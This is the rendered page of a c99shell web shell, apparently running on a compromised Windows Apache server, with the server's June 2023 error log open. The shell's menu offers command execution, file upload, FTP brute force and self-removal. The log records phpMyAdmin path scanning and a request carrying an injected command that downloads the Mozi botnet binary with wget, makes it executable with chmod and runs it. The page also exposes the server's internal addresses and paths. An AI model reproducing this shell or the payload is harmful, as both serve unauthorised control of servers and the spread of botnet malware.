!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2023.06.05.log (18.21 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Mon Jun 05 00:00:46.681616 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 00:00:48.319619 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 00:44:31.292626 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 00:50:27.051251 2023] [proxy:error] [pid 13072:tid 18284] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 05 00:50:27.051251 2023] [proxy:error] [pid 13072:tid 18284] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 05 00:50:27.051251 2023] [proxy_http:error] [pid 13072:tid 18284] [client 152.61.192.232:57726] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 05 00:50:27.332052 2023] [proxy:error] [pid 13072:tid 18284] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 05 00:50:27.628452 2023] [proxy:error] [pid 13072:tid 18284] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 05 01:10:15.430138 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 01:11:23.758259 2023] [proxy:error] [pid 13072:tid 17996] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 05 01:11:23.758259 2023] [proxy:error] [pid 13072:tid 17996] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 05 01:11:23.758259 2023] [proxy_http:error] [pid 13072:tid 17996] [client 152.61.128.50:37250] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 05 01:11:23.992259 2023] [proxy:error] [pid 13072:tid 17996] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 05 01:11:24.257459 2023] [proxy:error] [pid 13072:tid 17996] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 05 01:20:51.240455 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 01:21:12.534493 2023] [proxy:error] [pid 13072:tid 18512] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 01:21:12.534493 2023] [proxy:error] [pid 13072:tid 18512] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 01:21:12.534493 2023] [proxy_http:error] [pid 13072:tid 18512] [client 40.77.167.205:59392] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 01:35:29.974399 2023] [proxy:error] [pid 13072:tid 18512] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Mon Jun 05 01:35:29.974399 2023] [proxy:error] [pid 13072:tid 18512] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.16) for 60s
[Mon Jun 05 01:35:29.974399 2023] [proxy_http:error] [pid 13072:tid 18512] [client 157.55.39.239:38720] AH01114: HTTP: failed to make connection to backend: 172.22.1.16
[Mon Jun 05 02:30:09.630559 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 02:58:47.614777 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 03:55:59.511604 2023] [proxy:error] [pid 13072:tid 18100] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 03:55:59.511604 2023] [proxy:error] [pid 13072:tid 18100] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 03:55:59.511604 2023] [proxy_http:error] [pid 13072:tid 18100] [client 52.167.144.46:5952] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 04:11:37.447652 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 04:18:44.170801 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 04:20:24.229377 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 04:20:59.532239 2023] [proxy:error] [pid 13072:tid 19936] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 04:20:59.532239 2023] [proxy:error] [pid 13072:tid 19936] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 04:20:59.532239 2023] [proxy_http:error] [pid 13072:tid 19936] [client 40.77.167.205:60608] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 04:41:34.430408 2023] [proxy:error] [pid 13072:tid 18100] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 04:41:34.430408 2023] [proxy:error] [pid 13072:tid 18100] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 04:41:34.430408 2023] [proxy_http:error] [pid 13072:tid 18100] [client 40.77.167.205:60160] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 06:47:50.146914 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 07:14:14.594897 2023] [cgi:error] [pid 13072:tid 18100] [client 185.224.128.114:60582] script not found or unable to stat: E:/nuevo/htdocs/home.asp
[Mon Jun 05 07:53:01.276584 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 08:16:57.259106 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 08:23:52.625435 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 08:23:56.853043 2023] [proxy:error] [pid 13072:tid 18244] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 08:23:56.853043 2023] [proxy:error] [pid 13072:tid 18244] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 08:23:56.853043 2023] [proxy_http:error] [pid 13072:tid 18244] [client 40.77.167.245:33152] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 09:58:03.329760 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 10:55:34.336622 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 11:05:21.833653 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 11:24:38.965686 2023] [proxy:error] [pid 13072:tid 18904] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 05 11:24:38.965686 2023] [proxy:error] [pid 13072:tid 18904] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 05 11:24:38.965686 2023] [proxy_http:error] [pid 13072:tid 18904] [client 190.144.43.130:57755] AH01114: HTTP: failed to make connection to backend: 192.168.175.30
[Mon Jun 05 11:57:02.541900 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 12:01:52.172008 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 12:02:14.870048 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 12:16:10.298316 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 12:45:05.614163 2023] [proxy:error] [pid 13072:tid 18568] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 12:45:05.614163 2023] [proxy:error] [pid 13072:tid 18568] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 12:45:05.614163 2023] [proxy_http:error] [pid 13072:tid 18568] [client 40.77.167.205:58688] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 13:12:07.174612 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 13:19:50.885426 2023] [proxy:error] [pid 13072:tid 19016] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 13:19:50.885426 2023] [proxy:error] [pid 13072:tid 19016] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 13:19:50.885426 2023] [proxy_http:error] [pid 13072:tid 19016] [client 52.167.144.46:3392] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 13:21:03.051153 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 13:30:55.165793 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 14:17:55.479146 2023] [core:error] [pid 13072:tid 19368] [client 138.68.208.17:59806] AH00135: Invalid method in request MGLNDD_190.27.245.106_80
[Mon Jun 05 15:44:48.181502 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 16:05:48.538916 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 16:40:25.152163 2023] [proxy_http:error] [pid 13072:tid 21020] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 186.154.159.231:62732] AH01102: error reading status line from remote server 172.22.1.16:18080
[Mon Jun 05 16:40:25.152163 2023] [proxy:error] [pid 13072:tid 21020] [client 186.154.159.231:62732] AH00898: Error reading from remote server returned by /kwssiamovil/sm/des/cjson/pre
[Mon Jun 05 18:40:01.320767 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 18:47:37.668369 2023] [authz_core:error] [pid 13072:tid 18504] [client 47.74.88.37:60974] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Mon Jun 05 18:47:37.824369 2023] [authz_core:error] [pid 13072:tid 18232] [client 47.74.88.37:60990] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2
[Mon Jun 05 18:47:37.824369 2023] [authz_core:error] [pid 13072:tid 18640] [client 47.74.88.37:60978] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.11.4
[Mon Jun 05 18:47:38.463970 2023] [authz_core:error] [pid 13072:tid 18036] [client 47.74.88.37:32798] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.10.3
[Mon Jun 05 18:47:38.666771 2023] [authz_core:error] [pid 13072:tid 21300] [client 47.74.88.37:60964] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Mon Jun 05 18:47:39.555972 2023] [authz_core:error] [pid 13072:tid 18776] [client 47.74.88.37:32974] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.11.1.2
[Mon Jun 05 18:47:52.238794 2023] [authz_core:error] [pid 13072:tid 18944] [client 47.74.88.37:60998] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.11.3
[Mon Jun 05 18:48:05.545618 2023] [authz_core:error] [pid 13072:tid 17996] [client 47.74.88.37:32956] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.11.7
[Mon Jun 05 18:48:05.545618 2023] [authz_core:error] [pid 13072:tid 18540] [client 47.74.88.37:32902] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.10.2
[Mon Jun 05 18:48:06.637620 2023] [authz_core:error] [pid 13072:tid 19096] [client 47.74.88.37:33070] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin-2.5.5
[Mon Jun 05 19:10:30.049579 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 19:22:32.752049 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 19:42:20.428935 2023] [proxy:error] [pid 13072:tid 19936] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 19:42:20.428935 2023] [proxy:error] [pid 13072:tid 19936] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 19:42:20.428935 2023] [proxy_http:error] [pid 13072:tid 19936] [client 52.167.144.46:3712] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 19:58:18.723018 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 19:59:59.062394 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 20:36:21.194227 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 20:56:46.560779 2023] [core:error] [pid 13072:tid 19448] [client 117.215.217.192:45638] AH00126: Invalid URI in request 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
[Mon Jun 05 20:58:05.481318 2023] [proxy:error] [pid 13072:tid 18540] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Mon Jun 05 20:58:05.481318 2023] [proxy:error] [pid 13072:tid 18540] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Mon Jun 05 20:58:05.481318 2023] [proxy_http:error] [pid 13072:tid 18540] [client 40.77.167.245:32384] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Mon Jun 05 20:58:06.479719 2023] [proxy:error] [pid 13072:tid 18540] AH00940: HTTP: disabled connection for (192.168.175.18)
[Mon Jun 05 21:02:17.265760 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 21:30:45.952361 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 22:45:53.393078 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 22:46:28.961140 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 23:25:53.504094 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 23:29:19.705256 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 05 23:52:15.502872 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--